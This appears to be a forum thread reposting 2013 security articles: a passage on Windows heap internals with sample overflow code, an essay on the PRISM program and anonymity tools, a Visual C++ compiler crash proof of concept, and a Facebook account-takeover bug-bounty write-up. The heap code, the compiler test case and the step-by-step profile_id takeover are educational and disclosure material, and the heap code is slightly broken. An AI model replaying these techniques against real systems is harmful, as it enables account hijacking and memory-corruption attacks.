is not “full” yet. If buffer can be placed on lookaside, keep the buffer flags set to busy and return to caller. The other option is to coalesce and place in free buffer. This happens only if the buffer can’t be freed to lookaside. The conditions where coalesce fails: Freed buffer flags & 0×80 is true Freed buffer is first ? no backward coalesce Freed buffer is last ? no forward coalesce Adjacent buffer is busy The total size of two adjacent buffers is bigger than the virtual allocate threshold (0xFE00 * 8 bytes == ~64k) Insert to free list if: Coalesced block size < 1024 insert to proper free list entry. Coalesced block size > De-commit threshold and total heap free size is over De-commit total free threshold, then De-commit buffer back to the OS. Coalesced is smaller than virtual allocate threshold, insert the block into free list [0]. Coalesced block is bigger than virtual allocate threshold, break the buffer into smaller chunks, each one as big as possible, and place them on free list [0]. Heap Overflows Let`s take a look at this rather simple example of a vulnerable function: DWORD vulner(LPVOID str) { LPVOID mem = HeapAlloc(h, 0, 128); // strcpy(mem, str); // return 0; }HANDLE h = HeapCreate(0, 0, 0); // default flags As we can see, here the vulner() function copies data from a string pointed by str to an allocated memory block pointed at by buf, without a bound check. A string larger than 127 bytes passed to it will thereby overwrite the data coincidental to this memory block (which is, actually, a header of the following memory block). The lookaside list has two pointers pointing to the lookaside entries before and after it, called the FLINK and BLINK pointers. The layout for a single lookaside entry is given below: So, when an overflow occurs, we can overwrite the FLINK and BLINK pointers. Now let’s modify the above code: { HANDLE h = HeapCreate(0, 0, 0); LPVOID m1 = HeapAlloc(h, 0 , 64); LPVOID m2 = HeapAlloc(h, 0,128); HeapFree(m1); HeapFree(m2); // The above steps place the buffers in lookaside list LPVOID m1 = HeapAlloc(h, 0 , 64); // This sets up the memory for overwrite into adjacent memory blocks memcpy((char *)m, 0x31, 64+16); m2 = HeapAlloc(h, 0, 128-8); // strcpy(mem, str); // return 0; }DWORD vulner(LPVOID str) From the above code we can see that we have allocated two memory chunks and then freed them to the lookaside list; as mentioned above, any memory below 1024-8 bytes will be sent to the lookaside list. After that, an allocation of 64 bytes is done again. This will move the memory back to the busy list. But, in this case, the memory of 128 bytes will still be right next to the 64-byte chunk, so if we overflow the 64-byte chunk the data will write into 128-byte chunk. In the next line we are overwriting with 64+16 bytes of data which will overwrite the header and the FLINK, BLINK pointers of the 128 byte block. This is shown in the image below: Click to Enlarge The whole process of unlinking is shown below: Entry2?BLINK?FLINK = Entry2?FLINK Entry2?FLINK?BLINK = Entry2?BLINK So now, when the 128-byte buffer is allocated, it has already corrupted FLINK and BLINK pointers. This can be in an attacker’s control. So the entry “Entry2?BLINK?FLINK” will be in an attacker-controlled memory location; this can be overwritten with the value of Entry2?FLINK, which is also attacker-controlled. Conclusion This paper simply gives an understanding of the heap overflow process. The next article will give the details about how this vulnerability can be exploited. Sursa: InfoSec Institute Resources – Heap Overflow: Vulnerability and Heap Internals Explained
-
[h=1]PRISM – Facts, Doubts, Laws and Loopholes[/h]Pierluigi Paganini June 24, 2013 [h=1]Introduction[/h] Edward Snowden is the name of a 29-year-old technical assistant for the Central Intelligence Agency who disclosed the largest surveillance program implemented by the US known as the PRISM program. For better or for worse, his name is destined to enter into history. The Guardian identified Edward Snowden as a technical assistant who worked for US Intelligence at the National Security Agency for the last four years for various defense contractors. Currently he is an employee of security defense contractors Booz Allen Hamilton. Snowden decided to reveal his identity because like other whistleblowers, such as Bradley Manning, the US Army soldier who was arrested in May 2010 in Iraq on suspicion of having passed classified material to the website WikiLeaks, he decided to make public an uncomfortable truth. The disclosure started with the publication of the secret court order to Verizon Communications, but it was just the tip of the iceberg. All of the principal US IT companies support the surveillance program PRISM despite their high managements denying it. The surveillance architecture monitors every activity on the Internet, and it has been ongoing for many years. Through it the US Government has obtained access to user’s data, and private companies like Microsoft, Google, Facebook and Apple are all involved. Edward Snowden feared that the government will persecute him for disclosing Top Secret documentation on the extensive massive surveillance program PRISM. While I’m writing this, he is in a hotel in Hong Kong, where he flew after the publication of the presentation he prepared during his work in the NSA Office in Hawaii, around three weeks ago. Snowden decided to publish the history and proof of a program that every US citizen imagined but that authorities and private companies always denied. He left the US citing health reasons and flew to Hong Kong, the Chinese territory known also for its “strong tradition of free speech.” According to the interview released to The Guardian, Edward Snowden is concerned, as he knows very well the power of intelligence agencies and the ramifications of his actions. He has thus barricaded himself in a hotel. “I’ve left the room maybe a total of three times during my entire stay.” “I have no intention of hiding who I am, because I know I have done nothing wrong.” “I could be rendered by the C.I.A., I could have people come after me.” “We’ve got a C.I.A. station just up the road in the consulate here in Hong Kong, and I’m sure,” “that they’re going to be very busy for the next week, and that’s a fear I’ll live under for the rest of my life,” Snowden said. The confirmation of the existence of a PRISM program has shocked public opinion. Associations for the defense of freedom of expression and human rights are concerned about the violation of the citizens’ privacy, even if it is for homeland security reasons. The Obama administration is defending the surveillance program, saying it is necessary to prevent terrorist plots, and that the debated data collection has already allowed the prevention of terrorist acts. “Nobody is listening to your telephone calls. That’s not what this program is about.” “In the abstract you can complain about Big Brother and how this is a potential program run amok, but when you actually look at the details, I think we’ve struck the right balance.” “You can’t have 100 percent security and also then have 100 percent privacy and zero inconvenience.” “We’re going to have to make some choices as a society. … There are trade-offs involved.” These are what the President told journalists during a visit to California’s Silicon Valley. Edward Snowden considers himself as a patriot, having served his country as a soldier in Iraq and recently working as a contractor for the CIA overseas. He declared that he has carefully considered his actions and its possible consequences to the population, but nothing could be worse than what he witnessed. He carefully evaluated the documents he disclosed to ensure no people would be harmed and that the public interest would be served. “Anybody in positions of access with the technical capabilities that I had could, you know, suck out secrets to pass them on the open market to Russia.” “I had access to the full rosters of everyone working at the NSA, the entire intelligence community and undercover assets all around the world — the locations of every station we have, what their missions are.” “If I had just wanted to harm the U.S., you could shut down the surveillance system in an afternoon.” President Obama is in the eye of the storm. He was syndicated by some members of Congress despite the revelation announced by The White House that the administration has played at least 13 briefings to Congress to show the surveillance program operated by the NSA. [h=1]The Fact – The PRISM Program[/h] The Washington Post and the Guardian were the first newspapers to publish the news of the US machine for surveillance works. The NSA and FBI systematically access user information from central servers of the leading IT. The list revealed , despite the beliefs of many security experts, that the extension of the monitoring network is larger: AOL Apple Dropbox Facebook Google PalTalk Skype Yahoo You Tube The surveillance project began in 2007 and was supported by the Bush administration. It was known as PRISM and is capable of acquiring sensitive information from IT majors and then operating complex analysis activities. The Washington Post published an article on the PRISM program reporting the top secret documents disclosed in Snowden’s presentation. They revealed that PRISM has been referred at least 1,477 times during government briefings on Homeland Security. The document states that PRISM became popular during the Arab Spring when it was used to profile individuals considered dangerous for the US. The 41 slides composing the presentation, classified as Top Secret, claim that the “collection directly from the servers” of major US IT service providers remarks the need for the information for security purpose. The Guardian has verified the authenticity of the PowerPoint presentation that is circulating on the Internet. It is classified as top secret, with no distribution to foreign allies, and was apparently used to train operatives. “Information collected under this program is among the most important and valuable foreign intelligence information we collect, and is used to protect our nation from a wide variety of threats. The unauthorized disclosure of information about this important and entirely legal program is reprehensible and risks important protections for the security of Americans,” Director of National Intelligence James R. Clapper said. All the companies reported in the Top Secret document denied any knowledge of the secret program, following principal comments on the disclosure: “Google cares deeply about the security of our users’ data. We disclose user data to government in accordance with the law, and we review all such requests carefully. From time to time, people allege that we have created a government ‘back door’ into our systems, but Google does not have a back door for the government to access private user data,” stated Google. “We do not provide any government organization with direct access to Facebook servers,” “When Facebook is asked for data or information about specific individuals, we carefully scrutinize any such request for compliance with all applicable laws, and provide information only to the extent required by law,” declared Joe Sullivan, Chief Security Officer for Facebook. “We have never heard of PRISM,” “We do not provide any government agency with direct access to our servers, and any government agency requesting customer data must get a court order,” said Steve Dowling, a spokesman for Apple. [h=1]Is the PRISM Program Legal? Law and Regulations[/h] The digital exposure of Internet users has reached a level unthinkable until a few years ago. This aspect has had mainly positive effects but it has also increased the surface of attack for each individual. We are all exposed to serious privacy risks, especially as legislation has struggled to keep up. The number of laws that are trying to regulate our digital existence is increasing. There is a need to reduce the gaps in legislation and enforcement that open you up to online data breaches, stalking, identity theft and disclosure of user’s personal information. It must be considered that these laws can have a major impact on our life; every ordinary operation could be started with something simple such as a phone call. Analyzing the US legal model, we can recognize the different areas in which such laws are trying to regulate technology introduction, following a short list: [h=3]Digital Life[/h] Laws and proposals are designed to protect user’s privacy in the online and mobile spheres. The Protecting Children from Internet Pornographers Act of 2011 was designed to increase the enforcement of laws related to child pornography and child sexual exploitation. The Electronic Communications Privacy Act is almost 30 years old, so it is likely going to see some major revisions to reflect the increased variety and prevalence of electronic communications. The original act was designed to help expand federal wiretapping and electronic eavesdropping provisions, as well as to protect communications that occur via wire, oral, and electronic means and to balance the right to privacy of citizens with the needs of law enforcement. The Children’s Online Privacy Protection Act or COPPA protects children under 13 from the online collection of personal information. The GPS Act is a proposal to give government agencies, commercial entities, and private citizens specific guidelines for the use of geolocation information. [h=3]Digital Commerce[/h] The massive introduction of technology in commerce has requested the definition of strict laws to avoid the abuse of information on consumer habits and activities. Following is a list of laws that seek to address a number of major issues related to consumer privacy rights: The Commercial Privacy Bill of Rights establishes a baseline code of conduct for how personal information can be used, stored, and distributed. The Application Privacy, Protection, and Security Act of 2013 was designed to address concerns with the data collection being done through applications on mobile devicesand would require that app developers provide greater transparency about their data collection practices. The Location Privacy Protection Act of 2011 addresses the risks for stalking posed by cell phones loaded with GPS and apps that gather information about a user’s location. The Cyber Intelligence Sharing and Protection Act (CISPA) is designed to allow government investigation of cyber threats sharing of Internet traffic information between the US government and IT and manufacturing companies. [h=3]Work and Employment[/h] Laws and regulation that affect users in the workplace during their ordinary activity: Social Media Privacy Act is for the protection of online privacy for job seekers. Genetic Information Nondiscrimination Act of 2008 prohibits the use of genetic information in health insurance and employment. [h=3]Personal Information[/h] No doubt, the most important set of laws and regulations are those that address issues of personal information, including medical data, private phone conversations, and video watching history. The Foreign Intelligence Surveillance Act (FISA)Amendments Act of 2008/FISA Amendments Act Reauthorization Act of 2012 passed in 1978 but has undergone some major restructuring in recent years. It proscribed basic procedures for physical and electronic surveillance and the collection of foreign intelligence information. It also provides strict judicial and congressional oversight of any covert surveillance activities. It has been modified several times; the first time under the Patriot Act expired in 2008. The U.S. Senate voted in December 2012 to extend the FISA Amendments Act through the end of 2017.Under this act, the US Government is authorized to conduct surveillance of Americans’ international communications, including phone calls, emails, and Internet records, exactly what is addressed by the PRISM program. These orders do not need to specify who is being spied on or the reasons for doing so. It is now possible for government agencies to collect information on any foreign communications, which many individuals and privacy protection groups have consistently argued is a gross violation of privacy and civil liberties. The Health Information Technology for Economic and Clinical Health (HITECH) Act requires that major security breaches be reported to Health and Human Services as well as the media. It increases enforcement of HIPAA and the resulting penalties and ensures that any individual can request a copy of his or her public health record. Most importantly, it expands HIPAA regulations to include any business associates or providers to medical facilities, requiring vendors of any kind to keep private records private. The Video Privacy Protection Act was designed to prevent the disclosure of audio/video materials, with respect to the original proposal it has been integrated with social media sites. The Protect Our Health Privacy Act of 2012 requires health providers to encrypt any mobile device containing health information, restrict business associates’ use of protected health information, improve congressional oversight of HIPAA, and provide additional measures that would protect patient privacy and safety when using health information technology. [h=3]Back to the PRISM Case[/h] After the analysis of principal laws and proposals, users can have a clearer idea on what governments are allowed to do to ensure homeland security. The US PRISM program seems to be allowed by “Section 215 of the Patriot Act, which authorizes the existence of special procedures, authorized by the FISA court to force U.S. companies to deliver assets and records of their customers, from the metadata to confidential communications, including e-email, chat, voice and video, videos and photos”. It expands the law enforcement power to spy on every US citizen, including permanent residents, without providing explanation, starting the investigation on the exercise of First Amendment rights. Those who are the subjects of the surveillance are never notified of ongoing activities. Law enforcement could keep track of every activity made by a suspect, including communication and Internet activities. Many citizens and lawyers can consider Section 215 un-constitutional, claiming that it violates the Fourth Amendment by allowing the government to effect Fourth Amendment searches without a warrant and without showing probable cause. Section 215 might be used to obtain information that affect privacy interests other than those protected by the First Amendment, but let’s think to medical records. Also the Fourth and Fifth Amendments are violated by provision of such data by failing to require that those who are the subject of Section 215 orders be told that their privacy has been compromised. [h=1]The Outsourcing of Intelligence: Risks and Benefits[/h] The recent data leak on US Top Secret program PRISM by an intelligence contractor raised a debated discussion on the introduction of outsourcing for personnel to hire for top-secret programs. It was an inevitable consequence of the growth of the security sector and of the increased number of tasks needed by governments to ensure homeland security and the security of principal productive sectors. Edward Snowden has worked at Booz Allen Hamilton and other intelligence contractors. His career started at the Central Intelligence Agency with various technical assignments. In an official statement, the company Booz Allen declared, “Booz Allen can confirm that Edward Snowden, 29, was an employee of our firm for less than 3 months, assigned to a team in Hawaii. Snowden, who had a salary at the rate of $122,000, was terminated June 10, 2013 for violations of the firm’s code of ethics and firm policy. News reports that this individual has claimed to have leaked classified information are shocking, and if accurate, this action represents a grave violation of the code of conduct and core values of our firm. We will work closely with our clients and authorities in their investigation of this matter.” Snowden is one of the thousands of private intelligence contractors hired by the US Government to respond to the increased necessity of security to prevent terrorist attacks. The majority of these professionals play critical roles within the principal security agencies in the country. They access confidential information, gather sensitive data on intelligence missions, and work side by side with civil government analysts in accessing a huge quantity of secret and top-secret documents. According to the official reveal of the Office of the Director of National Intelligence, almost one in four intelligence workers were employed by contractors, and around 70% of the intelligence community’s secret budget is spent for outsourcing. The outsourcing of intelligence activities allows better rationalization of the funds designated to ensure homeland security but it also represents a serious risk for the possibility of infiltration of spies and whistleblowers. The AP reported that nearly 500,000 contractors have access to the government’s top secret programs. “Of the 4.9 million people with clearance to access “confidential and secret” government information, 1.1 million, or 21 percent, work for outside contractors, according to a report from Clapper’s office. Of the 1.4 million who have the higher “top secret” access, 483,000, or 34 percent, work for contractors.” In 2007, the former director of Naval Intelligence, retired Rear Adm. Thomas A. Brooks, wrote in a report that contractors assumed a crucial role within the nation’s intelligence infrastructure. “The extensive use of contractor personnel to augment military intelligence operations is now an established fact of life …. It is apparent that contractors are a permanent part of the intelligence landscape,” he said. To give an idea of the number of private contractors that worked for US intelligence agencies, The Post reported that 1,931 private companies worked on reserved counterterrorism operations and many other campaigns to empower homeland. The operations were conducted all over the country in around 10,000 locations. During the last year, the principal emergency was related to the increased number of cyber attacks, both sabotage and cyber espionage campaigns, against National networks. The massive introduction of technology has made necessary the recruitment of a large number of technicians who have been entrusted with the delicate task of protecting the country’s infrastructure such as communication networks, grids, and satellite systems. A recent trend that emerged to respond to continuous cyber attacks is the involvement in offensive operations of skilled professionals and hackers hired to instruct cyber units. These same hackers have been used to perform vulnerability assessments and penetration testing on critical infrastructures. [h=1]The Risk of Cyber Attacks on the US Massive Surveillance System[/h] One of the most alarming risks related to a Top Secret program such as PRISM is represented by the possible disclosure of the information gathered. Unauthorized access to the information could give a foreign government a meaningful advantage in terms of intelligence. Foreign hackers could have access to a huge quantity of sensitive information centralized and concentrated in a single vulnerable architecture. It must be considered that a possible attack could be taken advantage of by insiders and cyber spies. The case of Bradley Manning proved to the public opinion the devastating effect that the revelation of the government’s secret documents could have on homeland security. Starting with the consideration that nearly 854,000 people ordinarily manage top-secret security clearances, it is to understand the surface of attacks for the “machine” of Intelligence. Each of these individuals could be a target for state-sponsored hackers and could itself represent an insider threat. The disclosure of the PRISM program is a demonstration that principal US intelligence agencies and law enforcement weren’t able to protect Top Secret information from disclosure. The information has been acquired by a journalist thanks to a spontaneous revelation, but it must be considered that many other Top Secret programs could be affected by cyber espionage operations by foreign governments. “The access to PRISM information could enable blackmail on a massive scale, widespread manipulation of U.S. politics, and industrial espionage against American businesses.” If persistent collectors such as the Chinese government or a hostile country like Iran or North Korea could have access to a surveillance system, it could be a tragedy for the country. Suddenly the country will have no secret for the adversary, and every sector will be deeply impacted. Foreign governments aren’t unique in their interest in access to the surveillance system. Terrorists belonging to groups like Al Qaeda and also cyber criminals could breach the defense of Intelligence archives. The development and deployment of a massive surveillance system is a critical choice. The government in fact must be sure to be able to prevent foreign intrusions and to avoid the creation of maybe a single point of failure for the overall security of the country. [h=1]Countermeasures[/h] There are various ways to limit the exposure of our digital experience to surveillance and monitoring activities. The US Government and law enforcement could have access to email accounts such as Gmail messages, spy on user communication and discover their habits. Following are a few simple suggestions to avoid monitoring: [h=3]How to anonymize the user’s Internet experience?[/h] Tor Network On the Internet, every machine is identified by its IP address that could be hidden by using anonymizing services and networks such as I2P and Tor network. Usually, the anonymizing process is based on the concept of distribution of routing information. Tor software and the Tor open network help users to avoid surveillance during web browsing, hiding IP address and other identifying information if properly configured. The anonymity is granted through the bouncing of traffic among randomly routedproxy computers before sending it on to its real destination and through the message encryption. Every node of the network manages minimal information to route the packets to the next hop without conserving history on the path. Tor is easy to use. You can download the Tor Browser Bundle, a version of the Firefox browser that automatically connects to the Tor network for anonymous web browsing. Web Proxy To anonymize a user’s identity and its IP address, it is possible to use anonymizing services. The simplest way to do it is through Web-based proxies like Proxify or Hide My Ass. Web proxies are easy to use; just typing a website URL the user could visit it anonymously. Many of them also implement advanced features to encrypt connections or block cookies and JavaScript.Principal drawback is related to data speed and difficulty to access some contents like videos. Of course be aware of the proxy you use, as you could come across honeypots set up to spy on you. VPN Virtual Private Networks represent a valid solution to anonymously surf on internet. Premium VPNs’ paid services dedicate proxy servers for their customers. All client traffic is tunneled to the VPN server via this encrypted connection and from there to the web. This results in actually using the server’s IP to browse the web, instead of the client’s. The principal question is related to the attitude of some VPN providers to maintain server logs that could reveal user’s habits. Of course principal service providers deny it but it is a concrete risk. All the above solutions slow down surfing speed due to the application of tunneling processes and the implementation of cryptographic algorithms. [h=3]Keep private your chat conversations[/h] For every communication channel, there is a more or less secure solution. The events demonstrated that most popular conventional instant messaging services like those offered by Google, Yahoo or Microsoft keep track of your conversations. A typical solution to protect the content of chat communications is to encrypt end to end the messages, an operation that could be done using a self made chat client that enciphers the content to transmit or choosing a chat extension available on the Internet. A very popular cryptographic protocol that provides strong encryption for instant messaging conversations is OTR (“off the record”). It uses a combination of the AES symmetric-key algorithm, the Diffie–Hellman key exchange, and the SHA-1 hash function to protect user privacy. Using the protocol, the server only sees the encrypted conversations, thwarting eavesdropping. Of course, to use OTR, both interlocutors must install an instant messaging software that supports it, such as Pidgin for Windows and Linux systems. [h=3]Keep private your calls[/h] Telephone conversations are exposed to government monitoring, and PRISM is just the last demonstration of the control exercised by authorities for security reasons. Since a few years ago, users were convinced that Internet-based telephony applications represented the most secure way to make calls that avoid wiretapping. Skype was considered the most secure channel since its acquisition by Microsoft. Of course, I’m speaking of a commercial product, avoiding express reference to the various crypto-mobile and applications commercialized at high cost by many security firms. Today one of the most interesting solutions provided on the market is silent Circle. It implements an “end-to-end” encryption, making it impossible for telephone companies to access the user’s call. As reported by the Washington Post: “The client software is open source, and Chris Soghoian, the chief technologist of the American Civil Liberties Union, says it has been independently audited to ensure that it doesn’t contain any “back doors.”" Another interesting software having similar functionalities and that has been independently audited to make sure there are no back doors is Redphone, an application that protects phone calls with end-to-end encryption. It has been developed with financial support from U.S. Taxpayers courtesy of the Open Technology Fund. [h=3]Protecting emails[/h] Another critical aspect is the protection of user’s mail. Commercial PGP or free GPG are considered the standard for email security, and both can be used to both encrypt and decrypt messages avoiding surveillance. GNU Privacy Guard (GnuPG or GPG) is a GPL Licensed alternative to the PGP suite of cryptographic software. GnuPG is compliant with RFC 4880, which is the current IETF standards track specification of OpenPGP. Current versions of PGP (and Veridis’ Filecrypt) are interoperable with GnuPG and other OpenPGP-compliant systems. The main problem for GPG is that novice users could find it complicated to use and not portable. I can promise that in the next few weeks, a product designed by me and my staff that makes the use of GPG on multiple platforms very easy will become available. The solution I designed is very strong and impossible to hack, and it also hides many other surprising features. [h=1]Conclusions[/h] The existence of the PRISM program doesn’t surprise security experts or the common people. From a recent survey, the majority is willing to sacrifice his privacy for homeland security. In the PRISM story, I found personally concerning the approach of the principal IT company that professed totally different privacy respect. My last thought is for surveillance operations elsewhere in the planet that is often synonymous to censorship and persecutions. The laws and regulations of many countries accept these practices to protect the interest of the oligarchy that governs the state. What will happen now that we know that the machines spying on us are also equipped with artificial intelligence and can take action against human beings? [h=1]References[/h] Edward Snowden is the responsible for disclosure of PRISM program Edward Snowden: the whistleblower behind the NSA surveillance revelations | World news | The Guardian NSA slides explain the PRISM data-collection program - The Washington Post NSA Prism program taps in to user data of Apple, Google and others | World news | The Guardian The outsourcing of U.S. intelligence raises risks among the benefits - The Washington Post http://securityaffairs.co/wordpress/13191/laws-and-regulations/the-legislation-of-privacy-new-laws-that-will-change-your-life.html InfoSec Institute Resources – Introduction to Anonymizing Networks – Tor vs I2P NSA Leak Highlights Key Role Of Private Contractors The Legislation of Privacy: New Laws That Will Change Your Life - BackgroundCheck.org Five ways to stop the NSA from spying on you Sursa: InfoSec Institute Resources – PRISM – Facts, Doubts, Laws and Loopholes
-
[h=2]Crashing the Visual C++ compiler[/h]In September last year I received a programming question regarding multi-level multiple same-base inheritance in C++, under one of my video tutorials on YouTube. I started playing with some tests and went a little too extreme for the likings of Microsoft 32-bit C/C++ Optimizing Compiler (aka Visual C++), which crashed while trying to compile some of the test cases. After some debugging, it turned out that it crashed on a rather nasty memory write operation, which could be potentially exploitable. Given that I was occupied with other work at the time, I decided to report it immediately to Microsoft with just a DoS proof of concept exploit. After 9 months the condition was confirmed to be exploitable and potentially useful in an attack against a build service, but was not considered a security vulnerability by Microsoft on the basis that only trusted parties should be allowed to access a build service, because such access enables one to run arbitrary code anyway (and the documentation has been updated to explicitly state this). [h=2]Heads up![/h]If you are running a build service (Team Foundation Build Service), you might be interested in the following security note in this MSDN article: Installing Team Foundation Build Service increases the attack surface of the computer. Because developers are treated as trusted entities in the build system, a malicious user could, for example, construct a build definition to run arbitrary code that is designed to take control of the server and steal data from Team Foundation Server. Customers are encouraged to follow security best practices as well as deploy defense in-depth measures to ensure that their build environment is secure. This includes developer workstations. For more information regarding security best practices, see the [URL="http://technet.microsoft.com/library/cc184906.aspx"]TechNet Article Security Guidance[/URL]. In other words (keep in mind I'm not a build service expert, but this is how I understand it): Having access to a build service is equivalent to being able to execute arbitrary code with its privileges on the build server. It is best to lock down the build service, so that a potential compromise of a developer's machine doesn't grant the attacker an instant "Administrator" on the build server. You should make sure that the machines used by the programmers are fully trusted and secure (this is an obvious weak spot). Owning one dev's machine allows rapid propagation to both the build server and other programmers' machines that use the same build service (e.g. by hijacking the build process and generating "evil" DLLs/EXEs/OBJs/LIBs instead of what really was supposed to be built), not to mention the testers machines, etc. To sum up, a vulnerability in a compiler doesn't really change the picture that much, since even without exploiting the compiler a person having access to the build service can execute arbitrary code with its privileges. [h=2]The code that crashes[/h]The C++ code snippet capable of crashing the Microsoft C/C++ Optimizing compiler is shown below, with most details included in the comments (note: this bug is scheduled to be fixed in the future): #include <stdio.h> class A { public: int alot[1024]; }; class B : public A { public: int more[1024]; }; class C : public A { public: int more[1024]; }; class DA : public B,C { public: int much[1024]; }; class DB : public B,C { public: int much[1024]; }; #define X(a) \ class a ## AA : public a ## A, a ## B { public: int a ## AA_more[1024]; }; \ class a ## AB : public a ## A, a ## B { public: int a ## AB_more[1024]; } #define Y(a) \ X(a); X(a ## A); X(a ## AA); X(a ## AAA); X(a ## AAAA); \ X(a ## AAAAA); X(a ## AAAAAA); X(a ## AAAAAAA) Y(D); Y(DAAAAAAAA); Y(DAAAAAAAAAAAAAAAA); X(DAAAAAAAAAAAAAAAAAAAAAAAA); // Funny story. Without global it doesn't compile (LNK1248). // But with global it seems to overflow, and it compiles OK. int global[0x12348]; DAAAAAAAAAAAAAAAAAAAAAAAAAA x; int main(void) { printf("%p\n", &x); printf("%p\n", &x.DAAAAAAAAA_more[0]); // <--- customize this with changing // DAA...AA_more to different // amount of 'A' // Funny story no. 2. This above crashes the compiler (MSVC 16.00.30319.01): // test.cpp(61) : fatal error C1001: An internal error has occurred in the compiler. // (compiler file 'msc1.cpp', line 1420) // To work around this problem, try simplifying or changing the program near the locations listed above. // Please choose the Technical Support command on the Visual C++ // Help menu, or open the Technical Support help file for more information // Internal Compiler Error in cl.exe. You will be prompted to send an error report to Microsoft later. // // (2154.dd4): Access violation - code c0000005 (first chance) // First chance exceptions are reported before any exception handling. // This exception may be expected and handled. // eax=00000000 ebx=0044dd34 ecx=0000006c edx=00000766 esi=049a8890 edi=049f3fc0 // eip=73170bb7 esp=0044cd38 ebp=0044cd44 iopl=0 nv up ei pl nz na pe cy // cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00010207 // MSVCR100!_VEC_memcpy+0x5a: // 73170bb7 660f7f6740 movdqa xmmword ptr [edi+40h],xmm4 ds:002b:049f4000=???????????????????????????????? // return 0; } As previously mentioned, I didn't really have the time to delve into the details, but it seems the immediate reason of the crash is an invocation of memcpy() with a semi-controlled destination address (EDI is influenced by the source code). If you manage to prove that the bug is exploitable, let me know! [h=2]Vendor communication timeline[/h]2012-09-30: Report sent to Microsoft (DoS only PoC). 2012-10-01: Received ACK + request for further clarification. 2012-10-03: Received information that the crash appears to be exploitable. 2012-10-03: Sent clarification. 2012-11-01: Received confirmation that the issue is exploitable, and that it will not be treated as a security issue, but as a reliability issue. 2012-11-01: Sent description of a potential attack on a build server as a counterargument for it not being a security bug. 2012-11-06: Received ACK + information that the bug will be discussed again with the product team. 2012-12-18: Received "we are still working on it". 2013-01-31: Sent a ping. 2013-06-03: Sent a ping. 2013-06-15: Received information that the bug will be considered as a reliability issue. The build server documentation is updated with a security note. 2013-06-21: Sent a heads up with this blog post. 2013-06-24: Published this blog post. [h=2]Update[/h]A pretty awesome blog post with a gathering of compiler crashes (thx goes to Meredith for pointing this out): 57 Small Programs that Crash Compilers Sursa: gynvael.coldwind//vx.log
-
[h=2]Hijacking a Facebook Account with SMS[/h] This post will demonstrate a simple bug which will lead to a full takeover of any Facebook account, with no user interaction. Enjoy. Facebook gives you the option of linking your mobile number with your account. This allows you to receive updates via SMS, and also means you can login using the number rather than your email address. The flaw lies in the /ajax/settings/mobile/confirm_phone.php end-point. This takes various parameters, but the two main are code, which is the verification code received via your mobile, and profile_id, which is the account to link the number to. The thing is, profile_id is set to your account (obviously), but changing it to your target’s doesn’t trigger an error. To exploit this bug, we first send the letter F to 32665, which is Facebook’s SMS shortcode in the UK. We receive an 8 character verification code back. We enter this code into the activation box (located here), and modify the profile_id element inside the fbMobileConfirmationForm form. Submitting the request returns a 200. You can see the value of __user (which is sent with all AJAX requests) is different from the profile_id we modified. Note: You may have to reauth after submitting the request, but the password required is yours, not the targets. An SMS is then received with confirmation. Now we can initate a password reset request against the user and get the code via SMS. Another SMS is received with the reset code. We enter this code into the form, choose a new password, and we’re done. The account is ours. [h=4]Fix[/h] Facebook responded by no longer accepting the profile_id parameter from the user. [h=4]Timeline[/h] 23rd May 2013 - Reported 28th May 2013 - Acknowledgment of Report 28th May 2013 - Issue Fixed [h=4]Note[/h] The bounty assigned to this bug was $20,000, clearly demonstrating the severity of the issue. Sursa: http://blog.fin1te.net/post/53949849983/hijacking-a-facebook-account-with-sms